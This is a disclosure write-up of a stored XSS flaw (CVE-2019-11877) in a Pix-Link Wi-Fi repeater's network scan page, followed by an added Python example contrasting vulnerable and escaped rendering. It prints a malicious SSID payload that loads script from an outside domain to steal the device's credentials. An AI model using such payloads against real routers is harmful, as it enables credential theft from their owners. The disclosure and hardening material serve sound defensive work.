[CVE-2019-11877] Credentials Stealing Through XSS on Pix-Link Repeater

I needed a wifi repeater for my house and bought a Pix-Link LV-WR09 because it was one of the cheapest. I thought “What could go wrong with that?”

When I opened the repeater's configuration page, I saw that the network listing function could be vulnerable to a Cross-Site Scripting attack over a wifi network with a malicious BSSID.

I used my smartphone to create a wifi network named

<script>alert('XSS')</script>

And did the test:

Yes! It's vulnerable!!

Now it’s time to make a real attack.

The SSID has the restriction to fit a maximum of 32 characters, so I registered a small enough domain:

http://ilrg.xyz/

I changed the SSID on my smartphone to <script src=//ilrg.xyz></script> and in the index.html I put my script:

Now I just need to go to the settings page of the repeater and scan for available networks.

It will run the XSS and send the data to a file on my server.

It worked!

With this we have a POC!
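The root cause of the bug described above is that the scan page writes each SSID into its HTML verbatim. The following is an added example (not code from the post or from the Pix-Link firmware) that models that rendering step in Python: a vulnerable renderer beside a hardened one, plus the SSID length check that the 32-character limit suggests. The scan results, BSSIDs and signal values are constructed sample data; the two hostile SSIDs are the ones the post uses, and the check shows that both fit the 802.11 length limit, so length validation alone does not stop this class of bug and output encoding is the fix.

```python
import html
import re

# Constructed sample scan results, shaped like what a repeater's scan routine
# might hand to its settings page. BSSIDs and signal levels are made up.
SCAN_RESULTS = [
    {"ssid": "HomeNet", "bssid": "aa:bb:cc:dd:ee:01", "signal": -41},
    {"ssid": "<script>alert('XSS')</script>", "bssid": "aa:bb:cc:dd:ee:02", "signal": -60},
    {"ssid": "<script src=//ilrg.xyz></script>", "bssid": "aa:bb:cc:dd:ee:03", "signal": -72},
]

# 802.11 limits an SSID to 32 octets; this is the limit the post works around.
MAX_SSID_OCTETS = 32


def ssid_fits_80211(ssid: str) -> bool:
    """True if the SSID is a legal 802.11 length (0..32 octets as UTF-8)."""
    return len(ssid.encode("utf-8")) <= MAX_SSID_OCTETS


def render_vulnerable(results) -> str:
    """Models the flaw: attacker-controlled SSIDs go into the HTML as-is."""
    rows = [
        f"<tr><td>{r['ssid']}</td><td>{r['bssid']}</td><td>{r['signal']}</td></tr>"
        for r in results
    ]
    return "<table>" + "".join(rows) + "</table>"


def render_hardened(results) -> str:
    """Same table, but every field that came over the air is HTML-escaped.

    html.escape with quote=True also encodes ' and ", which matters when a
    value lands inside an attribute rather than a text node.
    """
    rows = []
    for r in results:
        ssid = html.escape(r["ssid"], quote=True)
        bssid = html.escape(r["bssid"], quote=True)
        signal = int(r["signal"])  # numeric field: coerce instead of escaping
        rows.append(f"<tr><td>{ssid}</td><td>{bssid}</td><td>{signal}</td></tr>")
    return "<table>" + "".join(rows) + "</table>"


# A coarse regression check a firmware test suite could run over rendered
# pages: no unescaped script element may survive in the output.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_script_tag(markup: str) -> bool:
    """True if an un-encoded <script ...> opening tag appears in the markup."""
    return SCRIPT_TAG.search(markup) is not None


if __name__ == "__main__":
    for r in SCAN_RESULTS:
        print(f"{r['ssid']!r}: fits 802.11 length limit = {ssid_fits_80211(r['ssid'])}")
    print("vulnerable page has live script tag:", contains_script_tag(render_vulnerable(SCAN_RESULTS)))
    print("hardened page has live script tag:  ", contains_script_tag(render_hardened(SCAN_RESULTS)))
    print(render_hardened(SCAN_RESULTS))
```

Both hostile SSIDs pass the length check (the second one is exactly 32 characters), so a device that only enforces the 802.11 limit still renders them. The hardened renderer turns them into inert text such as `&lt;script src=//ilrg.xyz&gt;&lt;/script&gt;`, and the regex check gives a cheap way to catch a regression in a firmware build's settings page.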

Sources that served as inspiration:

http://foofus.net/goons/percx/papers/Practical_Exploitation_Using_Malicious_SSIDs.pdf

https://medium.com/caio-noobs-around/roteador-tc7337-dns-poisoning-atrav%C3%A9s-de-xss-1a92ed254120

https://fireshellsecurity.team/cve-2017-14219-xss-no-roteador-intelbras-wrn-240/

Timeline:

28/04/2019 — First email sent to the vendor (no answer)

06/05/2019 — Second email sent to the vendor (no answer)

15/05/2019 — Third email sent to the vendor (no answer)

27/05/2019 — Disclosure